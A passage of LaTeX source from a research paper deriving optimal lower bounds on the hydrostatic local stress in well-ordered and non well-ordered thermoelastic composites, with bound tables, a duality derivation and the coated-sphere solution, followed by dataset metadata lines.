-\infty<\sigma_0\leq D(1-\frac{1}{L_2})& \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(D-\sigma_0)L_2-D] & Core material 2 and coating material 1 \\ \hline
D(1-\frac{1}{L_2})< \sigma_0< D(1-\frac{1}{M_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq 0 & Optimality undetermined\\ \hline
D(1-\frac{1}{M_2})\leq\sigma_0\leq D &\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material 2\\ \hline
D\leq \sigma_0 <\infty& \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)L_2+D]& Core material 2 and coating material 1\\ \hline
\end{array}
$$
Lower bounds and the associated optimal microstructures for all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}$ for $1< p\leq\infty$ for the case $h_2>h_1$ is given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(D-\sigma_0)L_1-D] & Core material 1 and coating material 2 \\ \hline
D\leq \sigma_0\leq D(1-\frac{1}{M_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(D-\sigma_0)M_1-D]& Core material 2 and coating material 1\\ \hline
D(1-\frac{1}{M_1})< \sigma_0< D(1-\frac{1}{L_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq 0& Optimality undetermined\\ \hline
D(1-\frac{1}{L_1})\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(\sigma_0-D)L_1+D]& Core material 1 and coating material 2\\ \hline
\end{array}
$$
Lower bounds and the associated optimal microstructures for all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}$ for $1< p\leq \infty$ for the case $h_1>h_2$ is given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D(1-\frac{1}{L_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(D-\sigma_0)L_1-D] & Core material 1 and coating material 2 \\ \hline
D(1-\frac{1}{L_1})< \sigma_0< D(1-\frac{1}{M_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq 0 & Optimality undetermined\\ \hline
D(1-\frac{1}{M_1})\leq\sigma_0\leq D & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(\sigma_0-D)M_1+D]& Core material 2 and coating material 1\\ \hline
D\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(\sigma_0-D)L_1+D]& Core material 1 and coating material 2\\ \hline
\end{array}
$$
Next we display lower bounds on $\max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}$.
We start with the case $h_2>h_1$ and the lower bounds and optimal geometries are given in the following table.
The phase in which the maximum is attained is denoted with an asterisk.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)L_1-D] & Core material $1^*$ and coating material 2 \\ \hline
D\leq \sigma_0\leq F & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)M_2-D]& Core material 1 and coating material $2^*$\\ \hline
F\leq \sigma_0<\infty & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)L_1+D]& Core material $1^*$ and coating material 2\\ \hline
\end{array}
$$
Lower bounds for and optimal microgepmetries for the case $h_1>h_2$ are given in the following table.
The phase in which the maximum is attained is denoted with an asterisk.
$$
\begin{array}{|l|l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq F & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)L_1-D] & Core material $1^*$ and coating material 2 \\ \hline
F\leq \sigma_0\leq D & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material $2^*$\\ \hline
D\leq \sigma_0 <\infty & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)L_1+D]& Core material $1^*$ and coating material 2\\ \hline
\end{array}
$$
\section{Lower bounds on local stress for non well-ordered thermoelastic composite media}
\label{sec-optstresshydrononwell}
In this section it is
assumed that the materials inside the heterogeneous medium are elastically non well-ordered, i.e., $\mu_1>\mu_2$ and $\kappa_2>\kappa_1$.
We fix $\Delta T$ and present lower bounds that are optimal for the full range of imposed hydrostatic stresses, i.e., $-\infty<\sigma_0<\infty$. The configurations that attain the bounds for the non well-ordered case are also given by the coated sphere assemblages \cite{hscoated}.
In what follows we list the lower bounds for the non well-ordered case. These bounds are derived in Section 5. Their optimality follows from explicit formulas for the moments of the local fields inside the coated sphere assemblage, these are discussed and presented in Section 5.
The first set of bounds apply to all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}$ for $1<p\leq\infty$.
We suppose that $h_2>h_1$ and list the bounds as a function of the imposed macroscopic stress $\sigma_0$. The bounds are displayed in the following table where the optimal microstructures are given by the coated spheres construction. The coating and core phase of the optimal coated sphere configuration is listed in the table below.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D(1-\frac{1}{M_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq
\sqrt{3}[(D-\sigma_0)M_2-D] & Core material 1 and coating material 2 \\ \hline
D(1-\frac{1}{M_2})\leq \sigma_0\leq D(1-\frac{1}{L_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq 0 & Optimality undetermined\\ \hline
D(1-\frac{1}{L_2})< \sigma_0< D & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)L_2+D]& Core material 2 and coating material 1 \\ \hline
D\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material 2\\ \hline
\end{array}
$$
Next we suppose that $h_1>h_2$ and present optimal lower bounds on $\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}$, for $1< p\leq\infty$. The bounds and associated optimal microstructures are given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D& \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(D-\sigma_0)M_2-D] & Core material 1 and coating material 2 \\ \hline
D< \sigma_0< D(1-\frac{1}{L_2}) & \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(D-\sigma_0)L_2-D] & Core material 2 and coating material 1\\ \hline
D(1-\frac{1}{L_2})\leq\sigma_0\leq D(1-\frac{1}{M_2}) &\langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq 0& Optimality undetermined\\ \hline
D(1-\frac{1}{M_2})\leq \sigma_0 <\infty& \langle|\mathbb{P}^H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material 2\\ \hline
\end{array}
$$
Lower bounds and the associated optimal microstructures for all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}$ for $1< p\leq\infty$ for the case $h_2>h_1$ is given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D(1-\frac{1}{M_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(D-\sigma_0)M_1-D] & Core material 2 and coating material 1 \\ \hline
D(1-\frac{1}{M_1})\leq \sigma_0\leq D(1-\frac{1}{L_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq 0& Optimality undetermined\\ \hline
D(1-\frac{1}{L_1})< \sigma_0< D & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq \sqrt{3}[(\sigma_0-D)L_1+D]& Core material 1 and coating material 2\\ \hline
D\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(\sigma_0-D)M_1+D]& Core material 2 and coating material 1\\ \hline
\end{array}
$$
Lower bounds and the associated optimal microstructures for all moments $\langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}$ for $1< p\leq \infty$ for the case $h_1>h_2$ is given in the following table.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(D-\sigma_0)M_1-D] & Core material 2 and coating material 1 \\ \hline
D< \sigma_0< D(1-\frac{1}{L_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq \sqrt{3}[(D-\sigma_0)L_1-D] & Core material 1 and coating material 2\\ \hline
D(1-\frac{1}{L_1})\leq\sigma_0\leq D(1-\frac{1}{M_1}) & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq 0& Optimality undetermined\\ \hline
D(1-\frac{1}{M_1})\leq \sigma_0<\infty & \langle|\mathbb{P}^H\sigma|^p\rangle_1^{1/p}\geq\sqrt{3}[(\sigma_0-D)M_1+D]& Core material 2 and coating material 1\\ \hline
\end{array}
$$
Next we display lower bounds on $\max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}$.
We start with the case $h_2>h_1$ and the lower bounds and optimal geometries are given in the following table.
The phase in which the maximum is attained is denoted by an asterisk.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq F & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)M_2-D] & Core material 1 and coating material $2^\ast$ \\ \hline
F\leq \sigma_0\leq D & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)L_1+D]& Core material $1^\ast$ and coating material 2\\ \hline
D\leq \sigma_0<\infty & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material $2^\ast$\\ \hline
\end{array}
$$
Lower bounds for and optimal microgepmetries for the case $h_1>h_2$ are given in the following table.
The phase in which the maximum is attained is denoted by an asterisk.
$$
\begin{array}{|l |l|p{1.35in}|}
\hline
Range & Lower Bound & Optimal microstructure\\ \hline
-\infty<\sigma_0\leq D & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)M_2-D] & Core material 1 and coating material $2^\ast$ \\ \hline
D\leq \sigma_0\leq F & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(D-\sigma_0)L_1-D]& Core material $1^\ast$ and coating material 2\\ \hline
F\leq \sigma_0 <\infty & \max_{\textbf{x} \hbox{\tiny in Q}}\left\{|\mathbb{P}^H\sigma(\textbf{x})|\right\}\geq\sqrt{3}[(\sigma_0-D)M_2+D]& Core material 1 and coating material $2^\ast$\\ \hline
\end{array}
$$
\bigskip
\section{Derivation of the lower bounds on $<|\mathbb{P}_H\sigma|^p>_i^\frac{1}{p}$}
\label{lower bound 2}
In this section we outline the methodology for proving optimal lower bounds.
The bounds are derived using duality relations. We use the following duality relation posed over the space of square integrable symmetric matrix fields $\eta$ that holds for $p>1$ given by
\begin{eqnarray}
\frac{1}{p}\langle|\mathbb{P}^H\sigma|^p\rangle_i=\sup_{\eta}\left\{\langle\mathbb{P}^H\sigma: \eta\rangle_i-\frac{1}{p'}\langle|\eta|^{p'}\rangle_i \right\},\hbox{ for $i=1,2$,
\label{vec1}}
\end{eqnarray}
where $p'$ is the conjugate exponent to $p$ given by $p'=\frac{p}{p-1}$.
This relation follows immediately from standard duality relations see, \cite{Dacorogna}.
Restricting $\eta$ to the set of all constant matrices and taking the supremum delivers the basic bounds:
\begin{eqnarray}
\langle|\mathbb{P}^H\sigma|^p\rangle_i&\geq &|\langle\mathbb{P}^H\sigma\rangle_i|^p
,\hbox{ $p>1$ and for $i=1,2$}.
\label{vecbound2}
\end{eqnarray}
We point out that equality holds in \eqref{vecbound2} if and only if $\mathbb{P}^H\sigma$ is identically constant inside the $i^{th}$ material.
In what follows we outline the method for obtaining bounds on the moments in material two noting that the identical procedure delivers bounds on the moments in material one. We introduce the indicator function of material one $\chi_1$ taking the value 1 in material one and zero outside. The indicator function corresponding to material two is denoted by $\chi_2$ and $\chi_2=1-\chi_1$.
To proceed we rewrite the right hand side of \eqref{vecbound2} in terms of the effective elastic properties and thermal expansion coefficient.
To do this we use the following identity given by
\begin{align}\label{5.1}
tr<\chi_2\sigma>=\frac{3k_2}{k_2-k_1}(\sigma_0-k_1\sigma_0(C^e)^{-1}I:I+k_1\Delta T (C^e)^{-1}H^e:I+k_1\Delta T<\lambda>:I).
\end{align}
\par
This identity is obtained in the following way.
Taking averages on both sides of \eqref{constitutive} gives $<\sigma>=\langle C(x)(\epsilon (\textbf{u}(x))-\Delta T\lambda(x))\rangle$. On writing $C(\textbf{x})=C_1+(C_2-C_1)\chi_2(\textbf{x})$ we see that
\begin{align}\label{5.2}
<\sigma>=C_1(\bar{\epsilon}-<\lambda>)+(C_2-C_1)C_2^{-1}<\chi_2\sigma>.
\end{align}
From \eqref{effelast} we see that $\bar{\epsilon}=(C^e)^{-1}(<\sigma>-\Delta T H^e)$ and for $\langle\sigma\rangle=\sigma_0 I$ we obtain
\begin{align}\label{5.3}
<\chi_2\sigma>=C_2(C_2-C_1)^{-1}(\sigma_0I-C_1((C^e)^{-1}\sigma_0 I-\Delta T (C^e)^{-1}H^e-\Delta T<\lambda>)).
\end{align}
The identity (\ref{5.1}) now follows by applying the hydrostatic projection $\mathbb{P}_H$ to both sides of (\ref{5.3}).
\par
We now derive the lower bound. Applying the basic bound \eqref{vecbound2} to $
\langle|\mathbb{P}_H\sigma|^p\rangle_2$ and (\ref{5.1}) gives
\begin{eqnarray}
&&\langle|\mathbb{P}_H\sigma|^p\rangle_2\nonumber\\
&&\geq |\langle\mathbb{P}_H\sigma \rangle_2|^p=\left(\frac{tr(\langle\chi_2\sigma\rangle)}{\sqrt{3}\theta_2}\right)^p\nonumber\\
&&=3^{p/2}\theta_2^{-p}|\frac{k_2}{k_2-k_1}|^p|k_1\sigma_0\left(\frac{1}{k_1}-(C^e)^{-1}I:I\right)+k_1\Delta T(C^e)^{-1}H^eI:I+k_1\Delta T \langle\lambda\rangle:I|^p.\label{5.4}
\end{eqnarray}
We note that equality holds in (\ref{5.4}) when $\mathbb{P}_H\sigma$ is constant inside material two.
We now employ an exact relation that relates the contraction $(C^e)^{-1}H^e:I$ involving the effective thermal stress tensor $H^e$ to the quantity $(C^e)^{-1}I:I$. The exact relation used here is given by
\begin{eqnarray}
(C^e)^{-1}H^e:I&=&\frac{3(h_2-h_1)(C^e)^{-1}I:I+3(\frac{h_1}{k_2}-\frac{h_2}{k_1})}{\frac{1}{k_1}-\frac{1}{k_2}}.
\label{exact}
\end{eqnarray}
This exact relation is a direct consequence of the exact relation developed by \cite{HashinRosen} for the effective thermal expansion tensor $\mathbf{\alpha}^e=-(C^e)^{-1}H^e$.
Substitution of \eqref{exact} into \eqref{5.4} and algebraic manipulation gives
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_2^{1/p}\geq \sqrt{3}\left|(\sigma_0-D)X+ D\right|,
\label{finalbd}
\end{eqnarray}
where
\begin{eqnarray}
X=\frac{\theta_2^{-1}}{k_1^{-1}-k_2^{-1}}\left(\frac{1}{k_1}-(C^e)^{-1}I:I\right).
\label{x}
\end{eqnarray}
As before we point out that equality holds in (\ref{finalbd}) when $\mathbb{P}_H\sigma$ is identically constant inside material two.
Identical arguments deliver the lower bound on the moments over material two given by
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_1^{1/p}\geq \sqrt{3}\left|(\sigma_0-D)Y+ D\right|,
\label{finalbd2}
\end{eqnarray}
where
\begin{eqnarray}
Y=\frac{\theta_1^{-1}}{k_2^{-1}-k_1^{-1}}\left(\frac{1}{k_2}-(C^e)^{-1}I:I\right),
\label{y}
\end{eqnarray}
where \eqref{finalbd2} holds with equality when $\mathbb{P}^H\sigma$ is a constant in material one.
The variables $X$ and $Y$ are constrained to lie within intervals set by bounds on the contraction
$(C^e)^{-1}I:I$. These bounds follow immediately from the work of Kantor and Bergman \cite{KB} and are given by
\begin{eqnarray}
(K_{HS}^+)^{-1}\leq (C^e)^{-1}I:I \leq (K_{HS}^-)^{-1},
\label{HS}
\end{eqnarray}
where $K_{HS}^-$ and $K_{HS}^+$ are the Hashin and Shtrikman bulk modulus bounds \cite{hashin} given by
\begin{eqnarray}
K_{HS}^+=k_1\theta_1+k_2\theta_2-(\frac{\theta_1\theta_2(k_2-k_1)^2}{k_1\theta_2+k_2\theta_1+\frac{4}{3}\mu_1})
\label{hs+}
\end{eqnarray}
and
\begin{eqnarray} K_{HS}^-=k_1\theta_1+k_2\theta_2-(\frac{\theta_1\theta_2(k_2-k_1)^2}{k_1\theta_2+k_2\theta_1+\frac{4}{3}\mu_2}).
\label{hs-}
\end{eqnarray}
These bounds hold both for elastically well-ordered materials and elastically non well-ordered materials.
When the materials are well--ordered \eqref{HS} implies that $X$ and $Y$ lie in the intervals
\begin{eqnarray}
L_2\leq & X&\leq M_2,\label{intervalwell1}\\
L_1\leq & Y& \leq M_1.
\label{intervalwell2}
\end{eqnarray}
while for non well--ordered materials
\begin{eqnarray}
M_2\leq & X&\leq L_2,\label{intervalnonwell1}\\
M_1\leq & Y& \leq L_1.
\label{intervalnonwell2}
\end{eqnarray}
A straightforward calculation in Section \ref{Newsolutions} shows that the hydrostatic component of the local stress is constant inside each phase of the coated sphere construction. Hence \eqref{finalbd} and \eqref{finalbd2} hold with equality for the coated spheres construction and we obtain explicit formulas for the moments of the hydrostatic component of the local stresses for these composites. For coated spheres with core phase 1 and coating phase 2, $(C^e)^{-1}I:I=(K_{HS}^-)^{-1}$ and
substitution of \eqref{hs-} into \eqref{x} and \eqref{y} together with \eqref{finalbd} and \eqref{finalbd2} shows that the moments are given by
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_2^{1/p}=\sqrt{3}\left|(\sigma_0-D)M_2+ D\right|,\hbox{ and}
\label{finalbdhs+}\\
\langle|\mathbb{P}_H\sigma|^p\rangle_1^{1/p}= \sqrt{3}\left|(\sigma_0-D)L_1+ D\right|.
\label{finalbd2hs+}
\end{eqnarray}
For coated spheres with core phase 2 and coating phase 1, $(C^e)^{-1}I:I=(K_{HS}^+)^{-1}$ and
substitution of \eqref{hs+} into \eqref{x} and \eqref{y} together with \eqref{finalbd} and \eqref{finalbd2} shows that the moments are given by
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_2^{1/p}=\sqrt{3}\left|(\sigma_0-D)L_2+ D\right|,\hbox{ and}
\label{finalbdhs-}\\
\langle|\mathbb{P}_H\sigma|^p\rangle_1^{1/p}= \sqrt{3}\left|(\sigma_0-D)M_1+ D\right|.
\label{finalbd2hs-}
\end{eqnarray}
We collect results and state the lower bounds and indicate when they are optimal.
\begin{theorem}{\rm Bounds for well-ordered composites, $k_1>k_2$.}
\label{optlowerboundswell}
For $1< p \leq\infty$, any choice of $\Delta T$, and $-\infty<\sigma_0<\infty$ the lower bounds are given by the following formulas.
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_2^{1/p}\geq \min_{L_2\leq X\leq M_2}\left\{\sqrt{3}\left|(\sigma_0-D)X+ D\right|\right\},
\label{finalbdmin2well}
\end{eqnarray}
and when the minimum is realized for $X=L_2$ the bound is attained by the fields inside the core phase of a coated sphere construction with core material 2 and coating 1; when the minimum is realized for $X=M_2$ the bound is attained by the fields inside the coating phase of a coated sphere construction with core material 1 and coating 2.
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_1^{1/p}\geq \min_{L_1\leq Y\leq M_1}\left\{\sqrt{3}\left|(\sigma_0-D)Y+ D\right|\right\},
\label{finalbdmin1well}
\end{eqnarray}
and when the minimum is realized for $Y=L_1$ the bound is attained by the fields inside the core phase of a coated sphere construction with core material 1 and coating 2 and when the minimum is realized for $Y=M_1$ the bound is attained by the fields inside the coating phase of a coated sphere construction with core material 2 and coating 1.
\end{theorem}
\begin{theorem}{\rm Bounds for non well-ordered composites, $k_2>k_1$.}
\label{optlowerboundsnonwell}
For $1< p \leq\infty$, any choice of $\Delta T$, and $-\infty<\sigma_0<\infty$ the lower bounds are given by the following formulas.
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_2^{1/p}\geq \min_{M_2\leq X\leq L_2}\left\{\sqrt{3}\left|(\sigma_0-D)X+ D\right|\right\},
\label{finalbdmin2nonwell}
\end{eqnarray}
and when the minimum is realized for $X=L_2$ the bound is attained by the fields inside the core phase of a coated sphere construction with core material 2 and coating 1; when the minimum is realized for $X=M_2$ the bound is attained by the fields inside the coating phase of a coated sphere construction with core material 1 and coating 2.
\begin{eqnarray}
\langle|\mathbb{P}_H\sigma|^p\rangle_1^{1/p}\geq \min_{M_1\leq Y\leq L_1}\left\{\sqrt{3}\left|(\sigma_0-D)Y+ D\right|\right\},
\label{finalbdmin1nonwell}
\end{eqnarray}
and when the minimum is realized for $Y=L_1$ the bound is attained by the fields inside the core phase of a coated sphere construction with core material 1 and coating 2 and when the minimum is realized for $Y=M_1$ the bound is attained by the fields inside the coating phase of a coated sphere construction with core material 2 and coating 1.
\end{theorem}
These bounds are stated explicitly in the first four tables of Sections 3 and 4.
We conclude by outlining the steps behind the derivation of the lower bounds on the maximum values of the local fields inside thermally stressed composites. For the well--ordered case we use the simple lower bound given by
\begin{eqnarray}
\max_{ \textbf{x}\hbox{ \tiny in $Q$}}\left\{\right|\mathbb{P}^H\sigma(\textbf{x})\}\geq\max\left\{A,B\right\}.
\label{linftyab}
\end{eqnarray}
where
\begin{eqnarray}
A&=&\min_{L_2\leq X\leq M_2}\left\{\sqrt{3}\left|(\sigma_0-D)X+ D\right|\right\},\nonumber\\
B&=&\min_{L_1\leq Y\leq M_1}\left\{\sqrt{3}\left|(\sigma_0-D)Y+ D\right|\right\}.
\label{ab}
\end{eqnarray}For the non well--ordered case we use
\begin{eqnarray}
\max_{\textbf{x}\hbox{ \tiny in $Q$}}\left\{\right|\mathbb{P}^H\sigma(\textbf{x})\}\geq\max\left\{C,D\right\}.
\label{linftycd}
\end{eqnarray}
where
\begin{eqnarray}
C&=&\min_{M_2\leq X\leq L_2}\left\{\sqrt{3}\left|(\sigma_0-D)X+ D\right|\right\},\nonumber\\
D&=&\min_{M_1\leq Y\leq L_1}\left\{\sqrt{3}\left|(\sigma_0-D)Y+ D\right|\right\}.
\label{cd}
\end{eqnarray}
The bounds given in the last two tables presented in Sections 3 and 4 follow from straight forward but tedious calculation of the explicit formulas corresponding to \eqref{linftyab} and \eqref{linftycd}.
A delicate but straight forward computation shows that these lower bounds are attained by the fields inside the coated sphere assemblage.
\bigskip
\bigskip
\section{Local stress and strain fields inside thermally stressed coated sphere geometries}
\label{Newsolutions}
In this section we summarize the properties of local fields inside the coated sphere assemblage in the presence of thermal stress due to a mismatch in the coefficients of thermal expansion. From linearity the local stress can be split into the sum of two components; one component arising from imposed mechanical stress and a second component associated with thermal stress. It is known that the local stress due to an imposed hydrostatic stress has constant hydrostatic part inside each phase, this follows from explicit solution see for example \cite{Milton}.
Here we display the explicit solution for the local stress due to mismatch in the coefficients of thermal expansion and show that it has a constant hydrostatic component inside each phase. From this we conclude that the total local stress inside the coated sphere assemblage has a constant hydrostatic component inside each phase.
We solve for the stress inside a prototypical coated sphere composed of a spherical core of material two with radius $a$, surrounded by a concentric shell of material one with an outer radius $b$. The ratio $(a/b)^3$ is fixed and equal to the inclusion volume fraction $\theta_2$. Here the the coefficients of thermal expansion for the core and coating are given by $h_1$ and $h_2$ respectively. The local elastic displacement $\tilde{\varphi}$ satisfies the equations of elastic equilibrium are given by:
\begin{displaymath}
\left\{\begin{array}{ll} div(C_2(\epsilon (\tilde{\varphi})-h_2I))=0 & 0<r<a ,\\
div(C_1(\epsilon (\tilde{\varphi})-h_1I))=0 & a<r<b,\\
C_1(\epsilon (\tilde{\varphi})-h_1I) \textbf{n}|_1=C_2(\epsilon (\tilde{\varphi})-h_2I)\textbf{n}|_2 & \text{continuity of traction at } r=a,\\
\tilde{\varphi} \quad\text{is continuous}& \text{on $0<r<b$},\\
\tilde{\varphi}=0 &\text{on the boundary $r=b$}.\end{array}\right.
\end{displaymath}
\par
We assume a general form of the solution given by
\begin{equation*}
\tilde{\varphi} =
\begin{cases}
C\textbf{r} & 0<r<a,\\
A\textbf{r}+B\frac{\textbf{n}}{r^2} & a<r<b,\\
0 & r\geq b,
\end{cases}
\end{equation*}
where $r=|\textbf{r}|, \textbf{n}=\textbf{r}/r$ and $A, B, C$ are unknowns. The corresponding strain field $\epsilon(\tilde{\varphi})$ is given by
\begin{equation}
(\epsilon (\tilde{\varphi}))_{ij} =\frac{1}{2}(\tilde{\varphi}_{i,j}+\tilde{\varphi}_{j,i})=
\begin{cases}
C\delta_{ij} & 0<r<a,\\
A\delta_{ij}+\frac{B}{r^3}(\delta_{ij}-3n_in_j) & a<r<b,\\
0 & r\geq b.
\end{cases}
\label{hydroconst}
\end{equation}
On applying the continuity of displacement and the traction at the interface we find that
$$A=\frac{3\theta_2(k_1h_1-k_2h_2)}{3k_1\theta_2+4\mu_1+3k_2(1-\theta_2)} , $$
$$B=\frac{-3a^3(k_1h_1-k_2h_2)}{3k_1\theta_2+4\mu_1+3k_2(1-\theta_2)} , $$
$$C=\frac{-3(1-\theta_2)(k_1h_1-k_2h_2)}{3k_1\theta_2+4\mu_1+3k_2(1-\theta_2)}.$$
\\
\par
Computation of the radical component of the stress at $r=b$ gives
\begin{eqnarray}
C_1(\epsilon(\tilde{\varphi})-h_1I) \textbf{n}=H^\ast\textbf{n}
\label{normal}
\end{eqnarray}
where $H^\ast$
\begin{align}\label{2.3}
H^\ast=\frac{3\theta_2(3k_1+4\mu_1)(k_1h_1-k_2h_2)}{3k_1\theta_2+4\mu_1+3k_2(1-\theta_2)}I-3k_1h_1I.
\end{align}
\\
\par
In this way we have constructed a solution $\tilde{\varphi}$ for the elastic field inside every coated sphere in the assemblage.
We now define $\varphi^p$ on the whole domain $Q$ to be given by $\tilde{\varphi}$ inside each coated sphere and zero outside. It easily follows on integrating by parts using
\eqref{normal} together with the fact that $\varphi^p$ vanishes on the boundary of each coated sphere that $\varphi^p$ is the weak solution \cite{Gilbarg} of $div(C(\epsilon (\varphi^p-\lambda))=0 $ over the full domain $Q$, i.e.,$$\langle C(\epsilon (\varphi^p)-\lambda):\epsilon(\phi)\rangle=0$$ for every periodic test function $\phi$.
Equation \eqref{hydroconst} implies that hydrostatic component of stress is constant inside each phase.
Last we show that the effective thermal stress $H^e$ for the coated sphere assemblage is given by $H^\ast$. Inside each coated sphere $S_i$, $i=1,2,\ldots$ we consider $\sigma=C(\epsilon (\varphi^p)-\lambda)$ and integrate by parts and apply \eqref{normal} to find that
\begin{eqnarray}
\int_{S_i}\sigma d\textbf{x}&=&\int_{\partial S_i}(\sigma\textbf{n})\otimes\textbf{x} ds\\
&=&\int_{\partial S_i}(H^\ast\textbf{n})\otimes\textbf{x} ds=|S_i|H^\ast
\label{intbyparts}
\end{eqnarray}
where $ds$ is an element of surface area on the outer surface of the coated sphere $\partial S_i$
and $|S_i|$ is the volume of $S_i$.
Substitution of \eqref{intbyparts} into \eqref{effectethstress}
gives the required identity
\begin{eqnarray}
H^e=\langle\sigma\rangle=\sum_{i=1}^\infty \int_{S_i}\sigma d\textbf{x}=H^\ast.
\label{intbypartsandidentity}
\end{eqnarray}
| 2024-02-18T23:40:07.050Z | 2009-10-16T23:13:46.000Z | algebraic_stack_train_0000 | 1,387 | 7,935 |
|
proofpile-arXiv_065-6865 | 2024-02-18T23:40:07.173Z | 2009-10-15T20:39:27.000Z | algebraic_stack_train_0000 | 1,392 | 2 |
||
proofpile-arXiv_065-6942 | \section{Introduction}\label{SectionIntroduction}
